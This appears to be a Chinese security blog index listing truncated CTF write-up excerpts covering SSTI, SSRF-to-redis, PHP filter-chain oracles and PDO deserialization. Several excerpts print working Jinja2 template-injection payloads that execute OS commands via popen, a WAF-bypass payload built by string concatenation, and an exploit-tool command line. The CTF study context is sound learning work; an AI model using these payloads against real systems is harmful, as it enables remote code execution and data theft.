西湖论剑
Rank-l登陆时可以发现其输入用户名和输入密码是在不同路径下的。
在经过尝试可以发现在登陆页面输入一次用户名,服务器会将其保存,后面输入密码时,如果错误会回显用户名因为是py所以尝试使用ssti
经过尝试可以发现,在用户名处存在ssti其过滤了一些特殊符号如/ * ;等。这里我使用equest.args.x1来进行绕过1phone_number={{g.pop.__globals__.__builtins__['__import__']('os').popen(request.args.x1).read()}}phone_number={{g.pop.__globals__.__builtins__['__import__']('os').popen(request.args.x1).read()}}
easydatalog下载查看日志可以发现其为使用蚁剑所记录的日志。一步步看下去可以发现用蚁剑传了一张jpg图片 ...
chuqiubei
easy_flask
登录框输入{{7*7}}发现是ssti,且变量可以从浏览器看出为user直接ssti即可。1?user={{cycler.__init__.__globals__.__builtins__['__import__']('os').popen('cat /app/flag').read()}}
file_copy
从报错可以看出其是使用copy函数来处理文件。我们可以使用php_filter_chains_oracle_exploit一把梭https://github.com/synacktiv/php_filter_chains_oracle_exploit
1python filters_chain_oracle_exploit.py --target http://eci-2zebps6z31jiqnksgy5t.cloudeci1.ichunqiu.com:80 --file /flag --paramet ...
培训
c020d5660b048b9f7f37ea66b4ec7175915dd87ce8423425a8b462462a869c69b00c4860d178b3be25cb6560090a973ceb7b7f87dedbb1643089b80192b5495bc435b49a8e3df8832a34841d19e59ca50a94e630125b032d57cb790ac3da4ca52cd5bd5475469e967039602d7e2c9a105d0f84c75a4c8ca67955f0b345c5b41c95dcc034f9f371479f23a5071864c775593362014782368555be972f9baaa7cba07de186ef83a679e804fa8ecbcb55dd057944522236355705ec1be184cdbcef69a35c3abd44191cd982b85ce8fe92cab18661af3d040bb1c2c62fedf24537c297039eb3a5bfe35276c5e8dfd41723ccbc3a7bbd14510b4a0 ...
软件系统安全赛
CachedVisitor
审计代码可以发现ssrf漏洞盲测也可以测出来,因为环境有redis,所有考虑使用ssrf来打redis。1234567891011121314151617181920212223242526local function execute_lua_code(script_content) local lua_code = script_content:match("##LUA_START##(.-)##LUA_END##") if lua_code then local chunk, err = load(lua_code) if chunk then local success, result = pcall(chunk) if not success then print("Error executing Lua code: ", result) end els ...
ctfshow 渗透赛
aa4d0537ff612e50e47a231e796e4a1f0515937c555566258a32aae013c98db1bc8e2652128ee964de3d3465414fcbc4a735b880e731490e9842e56244728385b1e883d067fa137fa0120a4789fd213a1b03d6face5045c20513d17088426dd033ad9fbebd8ab106e2345911ac0f290589d5b91a9e4161969a31ce72e59e2282caf44dce7a0e5d4211083a05dd19fca8f0bb397c010d43e5222f6f83f3b22b8e7777f0cb9ed299b8aabe79dba60744dd1c9cd5a40a779c0d9cc2a8be98855f238a7dd8c7c2891a5465cdb70dd8d63cc0f66bada9d91bdaad286f61c0cd2936546fb123266d1582028e8d4be0c28080b9004c22c7d724d60ed ...
从DAS的strange_php开始探究PDO在反序列化中的利用
平常上课都没听,最近都忙着速通期末都没时间来更博客了。PDO首先就是pdo的一些操作了。pdo是php中用于sql查询的类,一般开发者会对利用pdo来封装一个sql查询的类。
DASCTF 2024最后一战|寒夜破晓,冬至终章个人wp
周末一个人简单打了一下DAS
webconst_python1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192import builtinsimport ioimport sysimport uuidfrom flask import Flask, request,jsonify,sessionimport pickleimport base64app = Flask(__name__)app.config['SECRET_KEY'] = str(uuid.uuid4()).replace("-", "")class User: def __init__(self, username, password, auth= ...
CISCN&铁三-web
国内网安实在是太强辣,最后10分钟直接掉一百来名捏😠Safe_proxy
看源码可以发现器/路由存在ssti,并且为无回显的ssti。这时有两个思路,内存马或者打回显。我这里打算打500报错回显比较方便打内存马相对要绕的会比较多python flask 新型回显的学习和进一步的深入
因为waf禁了__,popen sys os等我这里选择拼接绕过
1code={{url_for["_"+"_globals_"+"_"]["_"+"_builtins_"+"_"]['setattr'](((lipsum['_'+'_spec_'+'_']|attr('_'+'_init_'+'_')|attr('_'+'_globals_'+'_'))[' ...
thinkphp5.x专题
1234git clone https://github.com/top-think/think.gitgit checkout v5.1.22修改composer.json的topthink/framework值为5.1.22composer install
国城杯
这个国城杯的题目难度有那么亿点高,复现一下应该能学到不少东西Ez_Gallery首先是爆破验证码我这里直接用captcha-killer+codereg.pyhttps://github.com/f0ng/captcha-killer-modified/tree/main
可以爆破出密码为123456。然后进入后可以发现一个文件读取看源码
我们可以发现是一个无回显且flag没有读取权限的ssti,那这就很明显了其想让我们将执行命令的内容带出来或者盲注。但因为其将数字和点都给过滤了,那么我们弹shell和dns外带的难度就很大了。
而且因为这道题目并比赛flask框架的而是pyramid加wsgiref的我们不好使用内存马。
而我在之前有看过一个师傅的flask宽假的响应头回显思路并自己进行了一次调试python flask 新型回显的学习和进一步的深入
其原理像server头等固定的响应头其实都是硬编码在代码里的,我们可以通过将这些值污染为我们命令执行的结果从而进行回显
我先在本地简单调了一下这个宽假,我前面说了这些请求头是硬编码的,所有大概率是在程序刚开始运行时就写入的。我直接将 ...